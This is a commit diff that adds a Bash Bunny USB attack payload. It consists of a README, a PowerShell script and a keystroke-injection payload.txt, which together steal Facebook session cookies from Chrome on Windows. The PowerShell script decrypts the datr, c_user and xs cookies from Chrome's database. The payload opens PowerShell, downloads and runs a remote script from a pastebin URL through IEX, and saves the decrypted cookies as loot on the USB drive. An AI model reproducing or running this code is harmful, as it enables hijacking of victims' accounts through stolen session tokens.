add WindowsCookies payload

payloads/library/WindowsCookies/README.md

@@ -0,0 +1,18 @@
+# WindowsCookies for Bash Bunnys
+
+Author: oXis    
+Version: Version 1.0    
+Credit: illwill, sekirkity, EmpireProject     
+
+## Description
+
+Based on BrowserCreds from illwill, this version grabs Facebook session cookies from Chrome on Windows, decrypt them and put them in /root/udisk/loot/FacebookSession    
+Only works for Chrome on Windows. Tested on two different Windows 10 machines.    
+Only payload.txt is required, powershell script is here only if you want to modify it.    
+
+## Payload LED STATUS
+
+| LED              | Status                                 |
+| ---------------- | -------------------------------------- |
+| Blue (blinking)  | Payload init                           |
+| Purple (blinking)| Done               				    |

payloads/library/WindowsCookies/get_facebook_cookies.ps1

@@ -0,0 +1,65 @@
+# Instructions: import the module, then perform the commanded needed.
+
+# Chrome Facebook cookies extraction
+# Use: Get-FacebookCreds [path to Login Data]
+# Path is optional, use if automatic search doesn't work
+
+function Get-FacebookCreds() {
+	Param(
+		[String]$Path
+	)
+
+	if ([String]::IsNullOrEmpty($Path)) {
+        $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
+	}
+
+	if (![system.io.file]::Exists($Path))
+	{
+		Write-Error 'Chrome db file doesnt exist, or invalid file path specified.'
+		Break
+	}
+
+	Add-Type -AssemblyName System.Security
+	# Credit to Matt Graber for his technique on using regular expressions to search for binary data
+	$Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
+	$Encoding = [system.Text.Encoding]::GetEncoding(28591)
+	$StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
+	$BinaryText = $StreamReader.ReadToEnd()
+	$StreamReader.Close()
+	$Stream.Close()
+
+	# First the magic bytes for the facebook string, datr size is 242 + 4 and hex is \x64\x61\x74\x72
+	$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x64\x61\x74\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{242})'
+	$PwdMatches = $PwdRegex.Matches($BinaryText)
+
+	# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
+	$Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
+	$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
+	$DecPwd = [System.Text.Encoding]::Default.GetString($Decrypt)
+
+	"datr is $DecPwd"
+
+	# First the magic bytes for the facebook string, c_user size is 226 + 4 and hex is \x63\x5F\x75\x73\x65\x72
+	$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x63\x5F\x75\x73\x65\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{226})'
+	$PwdMatches = $PwdRegex.Matches($BinaryText)
+
+	# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
+	$Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
+	$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
+	$DecPwd = [System.Text.Encoding]::Default.GetString($Decrypt)
+
+	"c_user is $DecPwd"
+
+	# First the magic bytes for the facebook string, xs size is 258 + 4 and hex is \x78\x73
+	$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x78\x73)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{258})'
+	$PwdMatches = $PwdRegex.Matches($BinaryText)
+
+	# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
+	$Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
+	$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
+	$DecPwd = [System.Text.Encoding]::Default.GetString($Decrypt)
+
+	"xs is $DecPwd"
+}
+
+Get-FacebookCreds

payloads/library/WindowsCookies/payload.txt

@@ -0,0 +1,48 @@
+#!/bin/bash
+#
+# Title:         Facebook session cookies dump
+# Author:        oXis (inspired by illwill)
+# Version:       1.0
+#
+# Dumps the stored session cookies from Chrome browser by downloading a Powershell script
+# then stashes them in /root/udisk/loot/FacebookSession/%ComputerName%
+# Credits to these guys for their powershell scripts:
+# https://github.com/sekirkity/BrowserGather BrowserGather.ps1
+# https://github.com/EmpireProject/Empire    Get-FoxDump.ps1
+# Also credit to illwill for the BrowerCreds payload
+
+#script 
+# Blue...............Running Script
+# Purple.............Got Browser Creds
+
+# QUACK SET_LANGUAGE gb
+#DUCKY_LANG='fr'
+
+LED R 200
+LOOTDIR=/root/udisk/loot/FacebookSession
+mkdir -p $LOOTDIR
+
+ATTACKMODE HID STORAGE
+LED B 200
+
+# wait 6 seconds for the storage to popup
+Q DELAY 6000
+Q GUI r
+Q DELAY 100
+Q STRING POWERSHELL
+Q ENTER
+Q DELAY 500
+Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \|  Select-Object -ExpandProperty DriveLetter\)
+Q ENTER
+Q DELAY 100
+
+#Dump Chrome Creds
+Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/pastebin.com\/raw\/25Z8peMb\'\)\; Get-FacebookCreds \| Out-File -Append \$Bunny\\loot\\FacebookSession\\\$env:computername.txt
+Q ENTER
+Q DELAY 100
+Q STRING exit
+Q ENTER
+Q DELAY 2000
+
+sync
+LED R B 200